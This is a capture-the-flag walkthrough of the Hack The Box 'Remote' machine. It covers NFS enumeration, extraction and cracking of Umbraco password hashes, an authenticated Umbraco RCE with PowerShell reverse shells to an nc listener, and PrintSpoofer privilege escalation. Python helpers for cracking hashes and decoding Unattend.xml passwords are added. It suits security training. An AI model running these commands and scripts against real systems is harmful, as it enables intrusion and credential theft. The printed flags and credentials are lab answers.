Remote
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Foothold
- http site is some ACME store
- has a umbraco cms login portal
- did not find the creds for it or even a valid email id as suggested by the login portal
- the version was also not found
- directory enum gives nothing
- running nmap scan on all ports shows 2049 open - NFS
- showmount -e 10.10.10.180
- the /site-backup directory is exported (no authentication, so it can simply be mounted and browsed)
- Looking for config files, umbraco.sdf was the main thing (Umbraco's SQL Server Compact database, which holds the backoffice user table)
- strings umbraco.sdf | head -n 100
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
- each line is one user row with the fields run together: username, email, hash material, {"hashAlgorithm":...}, email again, culture, GUID
- the admin@htb.local rows carry an unsalted SHA1 (40 hex chars); the smith/ssmith rows are salted HMACSHA256 (base64 salt followed by base64 hash), so the admin hash is the easy target
- put b8be16afba8c314ad33d812f22a04991b90e2aaa in umbraco.hash and run it as raw SHA1 (hashcat mode 100):
- hashcat -m 100 umbraco.hash rockyou.txt
admin@htb.local:baconandcheese
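The strings output above is one user row per line with the fields run together, which makes pulling hashes into hashcat by hand error-prone. The Python below is an added example, not part of the original notes or of Umbraco: it splits each row into username, e-mail, algorithm, salt and hash using the record layout visible above (assumption: the second copy of the e-mail is always followed by a culture tag such as en-US, and salted rows store a 24-character base64 salt before the hash), emits hashcat --username lines for the SHA1 rows, and repeats the crack offline against a small constructed word list standing in for rockyou.txt.

```python
"""Parse Umbraco user rows out of `strings umbraco.sdf` output and crack the
unsalted SHA1 ones offline. Added example; not from the original notes."""
import hashlib
import re

# Constructed sample, copied from rows the page shows. In the .sdf the fields
# of one user row come out of `strings` run together on a single line:
# <username><email><hash material>{"hashAlgorithm":"..."}<email><culture><guid>
SAMPLE_STRINGS = """\
Administratoradmindefaulten-US
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
"""

ALGO_RE = re.compile(r'\{"hashAlgorithm":"([A-Za-z0-9]+)"\}')
# The second copy of the e-mail is terminated by a culture tag like en-US.
# Assumption: the tag is always xx-XX and the address itself contains no such pattern.
EMAIL_RE = re.compile(r"^(\S+?)(?=[a-z]{2}-[A-Z]{2})")
SALT_B64_LEN = 24  # assumption: 16-byte salt -> 24 base64 chars


def parse_records(strings_output):
    """Return one dict per user row that carries a password hash."""
    users = []
    for line in strings_output.splitlines():
        m = ALGO_RE.search(line)
        if not m:
            continue                       # not a user row, or no hash stored
        before, after = line[:m.start()], line[m.end():]
        em = EMAIL_RE.match(after)
        if not em or "@" not in em.group(1):
            continue                       # row without an e-mail (skipped here)
        email = em.group(1)
        idx = before.rfind(email)
        if idx < 0:
            continue
        material = before[idx + len(email):]
        rec = {"user": before[:idx], "email": email, "algo": m.group(1)}
        if rec["algo"] == "SHA1":
            rec["salt"], rec["hash"] = None, material              # 40 hex chars
        else:
            rec["salt"] = material[:SALT_B64_LEN]                  # base64 salt
            rec["hash"] = material[SALT_B64_LEN:]                  # base64 hash
        users.append(rec)
    return users


def hashcat_lines(records):
    """Lines for `hashcat -m 100 --username`: email:hash, SHA1 rows only."""
    return [f"{r['email']}:{r['hash']}" for r in records if r["algo"] == "SHA1"]


def crack_sha1(records, wordlist):
    """Dictionary attack on the unsalted SHA1 rows (what hashcat -m 100 does)."""
    targets = {r["hash"].lower(): r["email"] for r in records if r["algo"] == "SHA1"}
    found = {}
    for word in wordlist:
        digest = hashlib.sha1(word.encode()).hexdigest()
        if digest in targets:
            found[targets[digest]] = word
    return found


# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "umbraco", "baconandcheese", "Welcome1"]

if __name__ == "__main__":
    recs = parse_records(SAMPLE_STRINGS)
    for r in recs:
        print(r)
    print("\n".join(hashcat_lines(recs)))
    print(crack_sha1(recs, WORDLIST))
```

The HMACSHA256 rows are parsed but not cracked here; they use Umbraco's keyed-hash scheme with the salt shown, which plain hashcat mode 100 does not cover. Feed the SHA1 lines to hashcat with --username so the email prefix is kept for reporting but ignored during cracking.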
- after logging in, we see umbraco 7.12.4
- https://github.com/noraj/Umbraco-RCE
- start nc listener
- python3 umbraco.py -u admin@htb.local -p baconandcheese -c powershell.exe -a '-e base64_payload_from_revshell'
- (umbraco.py is the exploit script from the repo above; it also takes the target URL with -i, e.g. -i http://10.10.10.180. It is an authenticated RCE against the backoffice's XSLT visualizer, which is why the cracked admin creds are needed first)
- on nc we get shell, go to Public/Desktop for user.txt - 9930587226f28d4ec6e41ba105a44a11
PrivEsc
- running winpeas
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
C:\Windows\Panther\Unattend.xml
Some AutoLogon credentials were found
DefaultUserName : Administrator

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
- trying to exploit SeImpersonatePrivilege - using https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
- send PrintSpoofer64.exe to target
- start nc listener on 8484
- .\printspoofer -i -c 'powershell -e base64_revshell_payload'
- (-i keeps the spawned process attached to the current console; PrintSpoofer needs the Print Spooler service running on the target, which it was here)
- nc shell gives us NT AUTHORITY\SYSTEM to get root.txt - d1a6d961b35338bd17b99a42a4b324b8
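Two of the winPEAS hits above are worth checking by hand rather than skimming: the privileges table (SeImpersonatePrivilege is what makes PrintSpoofer work, and SeAssignPrimaryTokenPrivilege would open the same family of attacks even though it shows Disabled, since a process can re-enable a privilege its token already holds) and the Unattend.xml AutoLogon block, for which winPEAS only reported a username. The Python below is an added example, not from these notes, winPEAS or PrintSpoofer: it parses a whoami /priv style table copied from the page, flags the privileges with a known abuse primitive, and decodes an AutoLogon password from a constructed Unattend.xml fragment (hypothetical password, not the box's file) using the documented encoding: when PlainText is false, Value is base64 of the UTF-16LE password with the literal string Password appended.

```python
"""Offline triage of two winPEAS findings: token privileges and Unattend.xml
AutoLogon. Added example; not from the original notes, winPEAS or PrintSpoofer."""
import base64
import re
import xml.etree.ElementTree as ET

# Constructed from the privileges table winPEAS printed on the page.
PRIV_TABLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges with a well-known abuse primitive. "Disabled" only means the
# privilege is held but not currently enabled in the token; the holder can turn
# it on with AdjustTokenPrivileges, so both states are reported.
ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token (PrintSpoofer, potato family)",
    "SeAssignPrimaryTokenPrivilege": "assign a SYSTEM token to a new process (potato family)",
    "SeBackupPrivilege": "read any file (dump SAM/SYSTEM hives)",
    "SeRestorePrivilege": "write any file or registry key",
    "SeDebugPrivilege": "open any process, e.g. LSASS",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privs(table):
    """{privilege: state} from a whoami /priv style table."""
    privs = {}
    for line in table.splitlines():
        m = PRIV_LINE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def abusable_privs(privs):
    """(name, state, why) for every held privilege with a known escalation path."""
    return [(n, s, ABUSABLE[n]) for n, s in privs.items() if n in ABUSABLE]


# Constructed Unattend.xml fragment with a hypothetical password (not the box's
# file). With <PlainText>false</PlainText> Windows stores
# base64(UTF-16LE(password + "Password")).
SAMPLE_PASSWORD = "Hunter2!"
ENCODED = base64.b64encode((SAMPLE_PASSWORD + "Password").encode("utf-16-le")).decode()
UNATTEND_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{ENCODED}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""

NS = re.compile(r"\{.*?\}")  # strip the XML namespace prefix from tag names


def unattend_autologon(xml_text):
    """(username, password) from the first AutoLogon block, or None if absent."""
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if NS.sub("", elem.tag) != "AutoLogon":
            continue
        kids = {NS.sub("", c.tag): c for c in elem}
        user = kids["Username"].text if "Username" in kids else None
        pw = kids.get("Password")
        if pw is None:
            return user, None
        pf = {NS.sub("", c.tag): (c.text or "").strip() for c in pw}
        value = pf.get("Value", "")
        if pf.get("PlainText", "true").lower() == "false":
            value = base64.b64decode(value).decode("utf-16-le")
            if value.endswith("Password"):
                value = value[: -len("Password")]   # drop the fixed suffix
        return user, value
    return None


if __name__ == "__main__":
    for name, state, why in abusable_privs(parse_privs(PRIV_TABLE)):
        print(f"{name:32} {state:9} {why}")
    print(unattend_autologon(UNATTEND_XML))
```

The same decoder applies to the AdministratorPassword element under UserAccounts in Unattend.xml and sysprep.xml, which use the identical encoding; on a real host the file may also have been scrubbed to `*SENSITIVE*DATA*DELETED*`, in which case base64 decoding fails and the entry is worthless.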